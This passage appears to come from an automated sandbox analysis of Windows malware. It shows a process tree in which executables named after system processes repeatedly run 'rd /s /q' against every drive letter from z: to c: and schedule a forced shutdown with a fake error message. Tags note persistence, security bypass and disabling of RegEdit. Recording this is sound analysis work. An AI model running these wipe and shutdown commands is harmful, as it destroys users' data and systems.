- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:816 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q z:3⤵PID:776
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q y:3⤵PID:4800
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4696
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q x:3⤵PID:2556
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q w:3⤵PID:2432
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q v:3⤵PID:3740
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q u:3⤵PID:4444
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q t:3⤵PID:5040
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q s:3⤵PID:1832
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q r:3⤵PID:4032
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q q:3⤵PID:4004
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q p:3⤵PID:3020
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q o:3⤵PID:2356
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q n:3⤵PID:5060
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q m:3⤵PID:4352
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q l:3⤵PID:3228
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q k:3⤵PID:3936
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q j:3⤵PID:4232
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q i:3⤵PID:5052
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q h:3⤵PID:2680
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q g:3⤵PID:4016
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2612
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q f:3⤵PID:4732
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q e:3⤵PID:2352
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q d:3⤵PID:5028
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q c:3⤵PID:1784
-
-
C:\Windows\Black Hole.exe"C:\Windows\Black Hole.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2100 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
-
C:\Windows\SysWOW64\Lubang Hitam.exe"C:\Windows\system32\Lubang Hitam.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4784 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2372
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3104 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4032 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1952 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3216 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:652
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4080 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:3328
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"2⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Modifies system executable filetype association
- Windows security modification
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3496 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q z:3⤵PID:2900
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4568
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q y:3⤵PID:564
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q x:3⤵PID:2620
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q w:3⤵PID:1052
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q v:3⤵PID:1576
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2436
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q u:3⤵PID:748
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q t:3⤵PID:3768
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q s:3⤵PID:3196
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q r:3⤵PID:4772
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q q:3⤵PID:5088
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q p:3⤵PID:1532
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q o:3⤵PID:1244
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q n:3⤵PID:2244
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q m:3⤵PID:532
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q l:3⤵PID:732
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q k:3⤵PID:3732
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q j:3⤵PID:5036
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q i:3⤵PID:3032
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q h:3⤵PID:4796
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q g:3⤵PID:4268
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4440
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q f:3⤵PID:4528
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q e:3⤵PID:4192
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q d:3⤵PID:4252
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q c:3⤵PID:228
-
-
C:\Windows\Black Hole.exe"C:\Windows\Black Hole.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2460 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3644 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4716
-
-
-
-
C:\Windows\SysWOW64\Lubang Hitam.exe"C:\Windows\system32\Lubang Hitam.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2092 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4064 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4964 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4924 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:3628
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3440
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4424 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:2584
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4932
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1852 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:4208
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"2⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Modifies system executable filetype association
- Windows security modification
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:2248 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q z:3⤵PID:440
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q y:3⤵PID:2460
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q x:3⤵PID:2472
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q w:3⤵PID:4328
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q v:3⤵PID:3756
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q u:3⤵PID:3644
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q t:3⤵PID:2100
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q s:3⤵PID:1400
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q r:3⤵PID:2976
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2856
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q q:3⤵PID:3928
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1452
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q p:3⤵PID:3964
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q o:3⤵PID:2092
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q n:3⤵PID:3028
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q m:3⤵PID:4740
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q l:3⤵PID:3408
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q k:3⤵PID:4988
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q j:3⤵PID:4116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4444
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q i:3⤵PID:4232
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2680
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q h:3⤵PID:2352
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q g:3⤵PID:4932
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q f:3⤵PID:1952
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1796
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q e:3⤵PID:3680
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q d:3⤵PID:4592
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q c:3⤵PID:2372
-
-
C:\Windows\Black Hole.exe"C:\Windows\Black Hole.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1372 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3140 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3952
-
-
-
-
C:\Windows\SysWOW64\Lubang Hitam.exe"C:\Windows\system32\Lubang Hitam.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4152 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4740 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:2028
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4460
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2704 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:4876
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2684
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3044 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:1120
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2264
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2100 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:1576
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2432
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3360 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:4752
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"2⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Modifies system executable filetype association
- Windows security modification
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:4632 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q z:3⤵PID:1936
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q y:3⤵PID:1252
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q x:3⤵PID:4320
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q w:3⤵PID:4944
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q v:3⤵PID:2916
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q u:3⤵PID:3952
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q t:3⤵PID:3320
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q s:3⤵PID:3692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2232
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q r:3⤵PID:4300
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q q:3⤵PID:2156
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q p:3⤵PID:2200
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2556
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q o:3⤵PID:3904
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q n:3⤵PID:4616
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q m:3⤵PID:4716
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q l:3⤵PID:3440
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1532
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q k:3⤵PID:3548
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q j:3⤵PID:5024
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q i:3⤵PID:3368
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q h:3⤵PID:2684
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q g:3⤵PID:384
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4316
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q f:3⤵PID:1820
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q e:3⤵PID:2704
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q d:3⤵PID:4816
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1244
-
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q c:3⤵PID:3568
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4308
-
-
-
C:\Windows\Black Hole.exe"C:\Windows\Black Hole.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2920 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:4464
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1400
-
-
-
-
C:\Windows\SysWOW64\Lubang Hitam.exe"C:\Windows\system32\Lubang Hitam.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:888 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:1196
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4780 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:3740
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1580
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4452 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:396
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3016 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:4928
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4616
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1396 -
